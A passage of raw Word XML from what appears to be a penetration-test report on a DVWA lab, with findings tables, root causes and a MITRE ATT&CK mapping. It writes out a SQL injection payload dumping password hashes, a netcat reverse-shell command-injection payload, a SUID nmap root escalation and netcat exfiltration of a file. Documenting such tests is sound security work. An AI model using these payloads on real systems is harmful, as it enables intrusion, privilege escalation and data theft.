            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B31EB44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id (GET parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5A615E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3DB7723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Payload used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7576672F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 xml:space="preserve">' UNION SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>user,password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM users -- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="72E91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46E5CB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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E7E27F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Full disclosure of users table — 5 usernames + MD5 hashes extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="45C21D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2701106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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504A1987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T1190 — Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="6AABD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FBE9B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OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5542470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A03:2021 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E2A246D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>Root cause: The id parameter was concatenated directly into the SQL query with no sanitization, parameterization, or type validation. At Low security level, even basic escaping was absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C45C64" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Finding 2 — OS Command Injection / Reverse Shell (Critical)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60F7B" w:rsidRPr="00F63671" w14:paraId="234660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3519264B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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="20DEED6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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="41F69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E99302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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B9AB8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OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="71B6BC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3D34FD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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6626988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http://192.168.100.20/dvwa/vulnerabilities/exec/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="29DC7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A710AD3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Payload used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB8E957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127.0.0.1; nc -e /bin/bash 192.168.100.10 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="50B3B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A4C078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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C9AB0C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Remote command execution as www-data — full shell access to target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="4E211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C6910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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB6993A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T1059 — Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="2AF0A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8FE24A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OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E91C55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A03:2021 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E62C16E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>Root cause: User input was concatenated directly into a system shell command without sanitization. The semicolon operator allowed injection of arbitrary OS commands after the expected ping input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA398DD" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding 3 — Privilege Escalation via SUID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Critical)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60F7B" w:rsidRPr="00F63671" w14:paraId="10BB3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682C3285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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="029B092A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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="2796D8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88D32B6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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BDF7BA2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SUID misconfiguration on /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5AA7A8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0EC7C7D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Discovery method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B709F9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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5E563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D024E87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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B7D65" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> --interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>→ !</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5F2FE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C83D0E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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BDB17E1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Escalated from www-data (low privilege) to root (full system control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="6CA508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C741CDC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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D84044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 xml:space="preserve">T1548.001 — Abuse Elevation Control Mechanism: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Setuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="76B920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23ABE7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CVE reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72A9CA0C" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>GTFOBins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> SUID escalation (documented technique)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3733D38B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 xml:space="preserve">Root cause: The SUID bit was set on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unnecessarily. Nmap version 4.53 on this system included an interactive mode with a shell-escape feature </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ran as root due to SUID, the spawned shell inherited root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A474D8B" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding 4 — Data Exfiltration via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Critical)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60F7B" w:rsidRPr="00F63671" w14:paraId="5B1E81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7C76A35C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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6E6606C4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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="40F2E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C51F57B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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F43391D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 xml:space="preserve">Raw TCP file transfer using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> on port 5555</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="210001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AE9F0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File exfiltrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6317BECF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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/secret.txt — simulated customer PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="00BCA1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83E318D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Transfer duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24FFB482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04:52:44 → 04:57:26 (approximately 4.5 minutes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="06A98B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F827BF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Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BDADEFE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None — no alert triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5B4928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1698173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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3797F2C4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Sensitive data left the target system undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="2600A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AF84B6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MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0883091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T1041 — Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01641F18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>Root cause: No outbound network monitoring, no DLP controls, and no egress firewall rules were in place to detect or block the transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790999FB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00653038" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F780ED" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following table maps every stage of the attack to the MITRE ATT&amp;CK framework — the industry-standard taxonomy for classifying attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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3000"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="157B0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F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6619E0DC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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="09D43B35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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="2DF00738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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6C51B433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</w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="1B406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A0648B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Nmap port scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433DE87C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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="390CBB88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Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38832C1F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T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="6EB73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FE2929C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Nmap scripting engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021F1BE7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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7E2D5A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Active Scanning: Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499EDDFE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T1595.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="12021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3670F4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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1497EB6D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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232F8393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Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D7631C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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="6A774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791662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Credential extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415CABA2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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B312D69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Unsecured Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A7DA87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T1552</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="5C779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0C5094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Hash cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397C3F2B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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9022C5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Brute Force: Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A92CAB7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T1110.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="4C9FF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4113403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Command injection / reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53054D40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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D717B53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Command and Scripting Interpreter: Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5594E848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T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="1E9056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CB54B0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 xml:space="preserve">SUID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267CAB59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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C62CC8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 xml:space="preserve">Abuse Elevation Control Mechanism: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Setuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B0B805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T1548.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="0C883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2575A64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Reading sensitive file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C337F41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Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA59AAF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Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="222BFCA6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T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w:rsidRPr="00F63671" w14:paraId="4E1BDD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4BA9E4" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> file transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C17EF2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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
